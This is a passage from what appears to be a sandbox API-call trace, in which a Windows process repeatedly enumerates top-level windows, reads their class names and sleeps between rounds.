out: lpClassName="IME") returned 3 [0195.786] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10190, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0195.787] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x603aa, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x103b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x103b4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x103b2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x103b0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x103ae, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10390, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x1038e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x1038c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x1038a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10388, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x2023c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10382, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x1037a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10378, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.787] GetClassNameA (in: hWnd=0x10376, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x301de, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10356, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10354, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10348, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10346, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10344, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10342, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10340, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10338, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10336, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x2023a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10322, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10316, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10314, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10302, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.788] GetClassNameA (in: hWnd=0x10300, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x20230, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x10278, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x10276, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x10274, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x10272, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x20218, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.789] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10256, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10248, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10246, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10244, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10242, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10212, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10208, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x40016, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x10238, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0195.790] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x20032, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.790] GetClassNameA (in: hWnd=0x2019e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.791] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.791] GetClassNameA (in: hWnd=0x20074, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0195.791] Sleep (dwMilliseconds=0x64) [0195.982] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0195.982] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0195.982] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0195.982] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0195.982] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.982] GetClassNameA (in: hWnd=0x10120, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.982] GetClassNameA (in: hWnd=0x10122, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.982] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.983] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.983] GetClassNameA (in: hWnd=0x10118, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0195.983] GetClassNameA (in: hWnd=0x10116, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.983] GetClassNameA (in: hWnd=0x10114, lpClassName=0x1076fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0195.983] Sleep (dwMilliseconds=0x64) [0196.167] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0196.168] Sleep (dwMilliseconds=0x64) [0196.307] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0196.308] Sleep (dwMilliseconds=0x64) [0196.644] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0196.644] Sleep (dwMilliseconds=0x64) [0196.914] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0196.915] Sleep (dwMilliseconds=0x64) [0197.110] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.110] Sleep (dwMilliseconds=0x64) [0197.289] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.290] Sleep (dwMilliseconds=0x64) [0197.423] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.426] Sleep (dwMilliseconds=0x64) [0197.587] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.587] Sleep (dwMilliseconds=0x64) [0197.764] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.764] Sleep (dwMilliseconds=0x64) [0197.956] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0197.956] Sleep (dwMilliseconds=0x64) [0198.124] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.124] Sleep (dwMilliseconds=0x64) [0198.237] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.237] Sleep (dwMilliseconds=0x64) [0198.344] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.344] Sleep (dwMilliseconds=0x64) [0198.476] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.500] Sleep (dwMilliseconds=0x64) [0198.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.702] Sleep (dwMilliseconds=0x64) [0198.921] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0198.921] Sleep (dwMilliseconds=0x64) [0199.044] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.044] Sleep (dwMilliseconds=0x64) [0199.188] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.189] Sleep (dwMilliseconds=0x64) [0199.339] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.342] Sleep (dwMilliseconds=0x64) [0199.620] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.620] Sleep (dwMilliseconds=0x64) [0199.782] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.782] Sleep (dwMilliseconds=0x64) [0199.909] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0199.909] Sleep (dwMilliseconds=0x64) [0200.080] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.080] Sleep (dwMilliseconds=0x64) [0200.203] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.204] Sleep (dwMilliseconds=0x64) [0200.345] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.345] Sleep (dwMilliseconds=0x64) [0200.484] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.484] Sleep (dwMilliseconds=0x64) [0200.631] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.631] Sleep (dwMilliseconds=0x64) [0200.843] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0200.843] Sleep (dwMilliseconds=0x64) [0201.028] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.029] Sleep (dwMilliseconds=0x64) [0201.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.154] Sleep (dwMilliseconds=0x64) [0201.336] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.336] Sleep (dwMilliseconds=0x64) [0201.546] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.546] Sleep (dwMilliseconds=0x64) [0201.718] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.719] Sleep (dwMilliseconds=0x64) [0201.917] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0201.918] Sleep (dwMilliseconds=0x64) [0202.107] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0202.107] Sleep (dwMilliseconds=0x64) [0202.303] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0202.339] Sleep (dwMilliseconds=0x64) [0202.532] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0202.533] Sleep (dwMilliseconds=0x64) [0202.712] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0202.713] Sleep (dwMilliseconds=0x64) [0202.872] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0202.873] Sleep (dwMilliseconds=0x64) [0203.106] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.106] Sleep (dwMilliseconds=0x64) [0203.281] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.281] Sleep (dwMilliseconds=0x64) [0203.405] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.406] Sleep (dwMilliseconds=0x64) [0203.639] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.640] Sleep (dwMilliseconds=0x64) [0203.794] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.795] Sleep (dwMilliseconds=0x64) [0203.964] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0203.964] Sleep (dwMilliseconds=0x64) [0204.076] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0204.077] Sleep (dwMilliseconds=0x64) [0204.282] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0204.283] Sleep (dwMilliseconds=0x64) [0204.544] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0204.545] Sleep (dwMilliseconds=0x64) [0204.770] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0204.771] Sleep (dwMilliseconds=0x64) [0205.026] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.026] Sleep (dwMilliseconds=0x64) [0205.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.202] Sleep (dwMilliseconds=0x64) [0205.358] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.358] Sleep (dwMilliseconds=0x64) [0205.564] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.564] Sleep (dwMilliseconds=0x64) [0205.718] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.719] Sleep (dwMilliseconds=0x64) [0205.830] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.830] Sleep (dwMilliseconds=0x64) [0205.932] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0205.933] Sleep (dwMilliseconds=0x64) [0206.122] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0206.123] Sleep (dwMilliseconds=0x64) [0206.279] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0206.279] Sleep (dwMilliseconds=0x64) [0206.448] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0206.448] Sleep (dwMilliseconds=0x64) [0206.672] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0206.673] Sleep (dwMilliseconds=0x64) [0207.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0207.154] Sleep (dwMilliseconds=0x64) [0207.387] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0207.388] Sleep (dwMilliseconds=0x64) [0207.620] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0207.620] Sleep (dwMilliseconds=0x64) [0207.920] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0207.920] Sleep (dwMilliseconds=0x64) [0208.105] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.106] Sleep (dwMilliseconds=0x64) [0208.388] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.388] Sleep (dwMilliseconds=0x64) [0208.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.562] Sleep (dwMilliseconds=0x64) [0208.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.716] Sleep (dwMilliseconds=0x64) [0208.830] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.830] Sleep (dwMilliseconds=0x64) [0208.980] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0208.983] Sleep (dwMilliseconds=0x64) [0209.168] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0209.169] Sleep (dwMilliseconds=0x64) [0209.309] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0209.309] Sleep (dwMilliseconds=0x64) [0209.480] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0209.481] Sleep (dwMilliseconds=0x64) [0209.763] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0209.764] Sleep (dwMilliseconds=0x64) [0209.903] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0209.904] Sleep (dwMilliseconds=0x64) [0210.077] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.077] Sleep (dwMilliseconds=0x64) [0210.245] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.249] Sleep (dwMilliseconds=0x64) [0210.388] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.388] Sleep (dwMilliseconds=0x64) [0210.514] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.514] Sleep (dwMilliseconds=0x64) [0210.654] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.654] Sleep (dwMilliseconds=0x64) [0210.803] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.806] Sleep (dwMilliseconds=0x64) [0210.928] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0210.929] Sleep (dwMilliseconds=0x64) [0211.081] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.081] Sleep (dwMilliseconds=0x64) [0211.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.250] Sleep (dwMilliseconds=0x64) [0211.402] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.403] Sleep (dwMilliseconds=0x64) [0211.560] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.560] Sleep (dwMilliseconds=0x64) [0211.710] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.713] Sleep (dwMilliseconds=0x64) [0211.890] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.890] Sleep (dwMilliseconds=0x64) [0211.997] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0211.997] Sleep (dwMilliseconds=0x64) [0212.128] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.129] Sleep (dwMilliseconds=0x64) [0212.267] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.267] Sleep (dwMilliseconds=0x64) [0212.378] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.379] Sleep (dwMilliseconds=0x64) [0212.521] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.521] Sleep (dwMilliseconds=0x64) [0212.675] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.675] Sleep (dwMilliseconds=0x64) [0212.826] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.827] Sleep (dwMilliseconds=0x64) [0212.950] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0212.951] Sleep (dwMilliseconds=0x64) [0213.105] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.105] Sleep (dwMilliseconds=0x64) [0213.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.214] Sleep (dwMilliseconds=0x64) [0213.339] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.340] Sleep (dwMilliseconds=0x64) [0213.460] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.461] Sleep (dwMilliseconds=0x64) [0213.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.670] Sleep (dwMilliseconds=0x64) [0213.794] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.795] Sleep (dwMilliseconds=0x64) [0213.955] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0213.955] Sleep (dwMilliseconds=0x64) [0214.110] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0214.110] Sleep (dwMilliseconds=0x64) [0214.387] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0214.389] Sleep (dwMilliseconds=0x64) [0214.573] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0214.573] Sleep (dwMilliseconds=0x64) [0214.747] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0214.748] Sleep (dwMilliseconds=0x64) [0214.953] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0214.954] Sleep (dwMilliseconds=0x64) [0215.125] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.126] Sleep (dwMilliseconds=0x64) [0215.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.249] Sleep (dwMilliseconds=0x64) [0215.389] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.390] Sleep (dwMilliseconds=0x64) [0215.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.655] Sleep (dwMilliseconds=0x64) [0215.810] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.811] Sleep (dwMilliseconds=0x64) [0215.968] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0215.968] Sleep (dwMilliseconds=0x64) [0216.135] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0216.135] Sleep (dwMilliseconds=0x64) [0216.327] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0216.327] Sleep (dwMilliseconds=0x64) [0216.468] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0216.468] Sleep (dwMilliseconds=0x64) [0216.620] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0216.621] Sleep (dwMilliseconds=0x64) [0216.917] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0216.917] Sleep (dwMilliseconds=0x64) [0217.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.108] Sleep (dwMilliseconds=0x64) [0217.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.214] Sleep (dwMilliseconds=0x64) [0217.389] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.389] Sleep (dwMilliseconds=0x64) [0217.558] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.558] Sleep (dwMilliseconds=0x64) [0217.733] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.734] Sleep (dwMilliseconds=0x64) [0217.901] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0217.901] Sleep (dwMilliseconds=0x64) [0218.056] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.056] Sleep (dwMilliseconds=0x64) [0218.216] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.217] Sleep (dwMilliseconds=0x64) [0218.380] 